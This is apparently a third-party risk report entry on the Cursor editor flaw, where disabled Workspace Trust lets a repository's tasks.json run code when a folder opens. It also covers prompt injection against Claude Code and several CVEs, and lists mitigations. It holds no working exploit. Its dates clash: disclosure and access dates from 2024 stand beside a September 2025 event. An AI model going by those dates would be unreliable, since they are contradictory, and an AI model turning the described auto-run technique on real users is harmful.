A critical security vulnerability was discovered in Cursor, an AI-powered fork of Visual Studio Code, where a disabled-by-default Workspace Trust setting allowed arbitrary code execution when a maliciously crafted repository was opened. Attackers could exploit this by embedding hidden *autorun* instructions in `.vscode/tasks.json`, triggering silent code execution upon folder opening. This flaw exposed users to supply chain attacks, risking sensitive credential leaks, unauthorized file modifications, or broader system compromise. The issue stemmed from Cursor’s default configuration, which prioritized convenience over security, leaving developers vulnerable to deceptive repositories hosted on platforms like GitHub. While mitigations (e.g., enabling Workspace Trust, auditing untrusted repos) were advised, the flaw highlighted systemic risks in AI-driven development tools, where classical security oversights (e.g., misconfigurations, missing sandboxing) amplify attack surfaces. The vulnerability underscored the broader trend of prompt injection and jailbreak risks in AI coding assistants, where malicious actors exploit trust gaps to bypass security reviews or execute unauthorized code.
Source: https://thehackernews.com/2025/09/cursor-ai-code-editor-flaw-enables.html
TPRM report: https://www.rankiteo.com/company/anysphereinc
"id": "any2753327100225",
"linkid": "anysphereinc",
"type": "Vulnerability",
"date": "9/2025",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'customers_affected': 'All Cursor users (especially '
'those opening untrusted '
'repositories)',
'industry': 'Technology (AI/Developer Tools)',
'name': 'Cursor',
'type': 'Software Vendor'},
{'customers_affected': 'Claude Code users (risk of '
'prompt injection, SQLi, '
'WebSocket bypass)',
'industry': 'Artificial Intelligence',
'location': 'United States',
'name': 'Anthropic',
'type': 'AI Company'},
{'industry': 'Software Development',
'location': 'Global',
'name': 'Developers using AI-assisted tools',
'type': 'End Users'}],
'attack_vector': ['Malicious Repository (GitHub/other platforms)',
'Auto-execution via `.vscode/tasks.json` (Workspace Trust '
'disabled)',
'Prompt Injection in AI Code Assistants (Claude Code, etc.)',
'WebSocket Authentication Bypass (CVE-2025-52882)',
'SQL Injection (Postgres MCP)',
'Path Traversal (Microsoft NLWeb)',
'Open Redirect/Stored XSS (Base44)'],
'customer_advisories': ['Cursor users: Update settings to enable Workspace '
'Trust immediately.',
'Claude Code users: Review security advisories on '
'prompt injection.',
'Open-source maintainers: Audit repositories for '
'malicious `.vscode/` configurations.'],
'data_breach': {'data_exfiltration': 'Possible (via malicious tasks or prompt '
'injection)',
'file_types_exposed': ['.vscode/tasks.json',
'.env',
'Database configurations',
'System files (e.g., /etc/passwd)'],
'personally_identifiable_information': 'Potential (if '
'credentials include '
'PII)',
'sensitivity_of_data': 'High (includes authentication '
'secrets, proprietary code)',
'type_of_data_compromised': ['Credentials',
'Source code',
'System files',
'Environment variables',
'Project metadata']},
'date_publicly_disclosed': '2024-10-01T00:00:00Z',
'description': 'A security weakness in the AI-powered code editor Cursor '
'allows arbitrary code execution when a maliciously crafted '
'repository is opened. The issue arises because Workspace '
'Trust (a VS Code security feature) is disabled by '
'default in Cursor, enabling attackers to auto-execute '
'malicious tasks via `.vscode/tasks.json` when a folder is '
'opened. This could lead to credential leaks, file '
'modifications, or broader system compromise. The '
'vulnerability exposes users to supply chain attacks via '
'booby-trapped repositories hosted on platforms like GitHub. '
'Users are advised to enable Workspace Trust, audit untrusted '
'repositories, and use alternative editors for suspicious '
'projects.\n'
'\n'
'The incident highlights broader risks in AI-powered coding '
'tools, including prompt injection/jailbreak attacks '
'(e.g., tricking Claude Code into ignoring vulnerabilities or '
'executing malicious test cases), WebSocket authentication '
'bypass (CVE-2025-52882), SQL injection in Postgres MCP, '
'path traversal in Microsoft NLWeb, and open '
'redirect/XSS in Base44. Anthropic and other vendors have '
'acknowledged these risks, emphasizing the need for '
'sandboxing, monitoring, and classical security controls in '
'AI-driven development environments.',
'impact': {'brand_reputation_impact': ['Erosion of trust in Cursor/Anthropic '
'security practices',
'Negative perception of AI-driven '
'development safety'],
'data_compromised': ['Sensitive credentials',
'Source code/files',
'System configurations (e.g., `/etc/passwd`)',
'Cloud credentials (.env files)',
'Project data (via AI tools like Claude '
'Code)'],
'identity_theft_risk': 'High (via credential leaks)',
'operational_impact': ['Compromised development environments',
'Malicious code pushed to production (via '
'tricked AI reviews)',
'Loss of trust in AI-assisted coding tools',
'Incident response overhead for affected '
'teams'],
'systems_affected': ['Cursor (AI-powered VS Code fork)',
'Claude Code (Anthropic)',
'Postgres MCP server',
'Microsoft NLWeb',
'Lovable (CVE-2025-48757)',
'Base44',
'Ollama Desktop',
'Developer workstations (via malicious '
'repositories)']},
'initial_access_broker': {'backdoors_established': 'Possible (via persistent '
'malicious tasks or AI '
'model poisoning)',
'data_sold_on_dark_web': 'Potential (stolen '
'credentials, code)',
'entry_point': ['Malicious repository (GitHub, '
'etc.) with crafted '
'`.vscode/tasks.json`',
'Prompt injection via external '
'files/websites (Claude Code)',
'WebSocket connection to '
'unauthenticated local server '
'(CVE-2025-52882)'],
'high_value_targets': ['Developer workstations',
'CI/CD pipelines',
'Cloud credentials (.env '
'files)',
'Proprietary codebases']},
'investigation_status': 'Ongoing (vendor patches pending; community awareness '
'raised)',
'lessons_learned': ['Default security settings in AI tools must prioritize '
'safety over convenience (e.g., Workspace Trust enabled '
'by default).',
'AI-assisted coding introduces novel attack vectors '
'(prompt injection, jailbreaks) that bypass traditional '
'controls.',
'Classical vulnerabilities (SQLi, XSS, path traversal) '
'remain critical even in AI-driven environments.',
'Sandboxing and input validation are essential for '
'AI-generated code/test cases.',
'Supply chain risks extend to AI model integrations '
'(e.g., MCP, Google APIs).',
'Developer education is key to mitigating social '
'engineering via malicious repositories.'],
'motivation': ['Supply chain compromise',
'Credential theft',
'Data exfiltration',
'System persistence',
'AI model manipulation (prompt injection)'],
'post_incident_analysis': {'corrective_actions': ['Cursor: Change default to '
'enable Workspace Trust.',
'Anthropic: Enhance prompt '
'injection defenses in '
'Claude Code.',
'Vendors: Patch '
'WebSocket/SQLi/path '
'traversal flaws.',
'Industry: Develop '
'standards for secure '
'AI-assisted development.',
'Community: Share '
'indicators of compromise '
'(IoCs) for malicious '
'repositories.'],
'root_causes': ['Insecure default settings '
'(Workspace Trust disabled in '
'Cursor).',
'Lack of input validation for AI '
'tool integrations (prompt '
'injection).',
'Insufficient sandboxing for '
'auto-executed tasks/code.',
'Classical vulnerabilities in '
'AI-adjacent components '
'(WebSocket, SQLi).',
'Over-reliance on user vigilance '
'for supply chain risks.']},
'recommendations': [{'for_developers': ['Enable Workspace Trust in Cursor and '
'similar IDEs.',
'Open untrusted repositories in '
'restricted editors first.',
'Audit `.vscode/tasks.json` and other '
'auto-execution configurations.',
'Monitor AI tools (e.g., Claude Code) '
'for unexpected behavior.',
'Use dedicated accounts/workspaces '
'for experimental AI-assisted '
'coding.']},
{'for_vendors': ['Ship products with secure defaults '
'(e.g., Workspace Trust enabled).',
'Implement robust sandboxing for '
'AI-generated code execution.',
'Add behavioral detection for prompt '
'injection attempts.',
'Conduct red-team exercises for AI tool '
'integrations.',
'Provide clear documentation on supply '
'chain risks (e.g., malicious '
'repositories).']},
{'for_organizations': ['Include AI tool risks in '
'third-party security assessments.',
'Restrict AI code assistants to '
'non-production environments where '
'possible.',
'Deploy network controls to limit '
'outbound connections from IDEs.',
'Train developers on AI-specific '
'threats (e.g., prompt injection).',
'Monitor for anomalous activity in '
'version control systems (e.g., '
'sudden malicious commits).']}],
'references': [{'date_accessed': '2024-10-01',
'source': 'Oasis Security Analysis',
'url': 'https://oasis.security/blog/cursor-workspace-trust-vulnerability'},
{'date_accessed': '2024-09-28',
'source': 'Checkmarx Report on AI Supply Chain Risks',
'url': 'https://checkmarx.com/blog/ai-driven-development-security-risks'},
{'date_accessed': '2024-09-30',
'source': 'Anthropic Security Advisory (Claude Code)',
'url': 'https://anthropic.com/security/prompt-injection-risks'},
{'date_accessed': '2024-10-02',
'source': 'Imperva Blog on AI Security Failures',
'url': 'https://imperva.com/blog/ai-driven-development-security-gaps'},
{'date_accessed': '2024-10-01',
'source': 'CVE-2025-52882 (WebSocket Auth Bypass)',
'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-52882'},
{'date_accessed': '2024-09-29',
'source': 'CVE-2025-48757 (Lovable Authorization Bypass)',
'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48757'}],
'response': {'communication_strategy': ['Public disclosure by Oasis '
'Security/Checkmarx',
'Anthropic advisories on prompt '
'injection risks',
'Imperva blog on classical security '
'failures in AI tools'],
'containment_measures': ['Enable Workspace Trust in Cursor',
'Audit repositories before opening in '
'Cursor',
'Use alternative editors for untrusted '
'projects',
'Monitor Claude Code for unexpected '
'data access',
'Sandbox AI-generated test cases'],
'enhanced_monitoring': ['Monitor AI tool interactions (e.g., '
'Claude Code file edits)',
'Log WebSocket connections in IDE '
'extensions'],
'remediation_measures': ['Cursor: Enable Workspace Trust by '
'default (pending)',
'Anthropic: Patch WebSocket auth bypass '
'(CVE-2025-52882)',
'Fix SQLi in Postgres MCP',
'Address path traversal in Microsoft '
'NLWeb',
'Mitigate open redirect/XSS in Base44',
'Improve cross-origin controls in '
'Ollama Desktop'],
'third_party_assistance': ['Oasis Security (vulnerability '
'analysis)',
'Checkmarx (supply chain security '
'report)']},
'stakeholder_advisories': ['Developers: Audit repositories and enable '
'Workspace Trust.',
'Security Teams: Monitor for AI tool abuses and '
'supply chain attacks.',
'Executives: Assess organizational exposure to '
'AI-driven development risks.'],
'title': 'Cursor AI-Powered Code Editor Arbitrary Code Execution '
'Vulnerability via Malicious Repository',
'type': ['Arbitrary Code Execution',
'Supply Chain Attack',
'Prompt Injection',
'Security Misconfiguration'],
'vulnerability_exploited': ['Disabled Workspace Trust in Cursor (VS Code '
'fork)',
'Auto-execution of `runOptions.runOn: '
"'folderOpen'` in tasks",
'Lack of sandboxing in AI-generated test cases '
'(Claude Code)',
'Incomplete cross-origin controls (Ollama '
'Desktop)',
'Incorrect authorization (Lovable, '
'CVE-2025-48757)',
'WebSocket auth bypass (CVE-2025-52882, CVSS: '
'8.8)',
'SQLi in Postgres MCP (bypassing read-only '
'restrictions)',
'Path traversal in Microsoft NLWeb (reading '
'`/etc/passwd`, `.env`)']}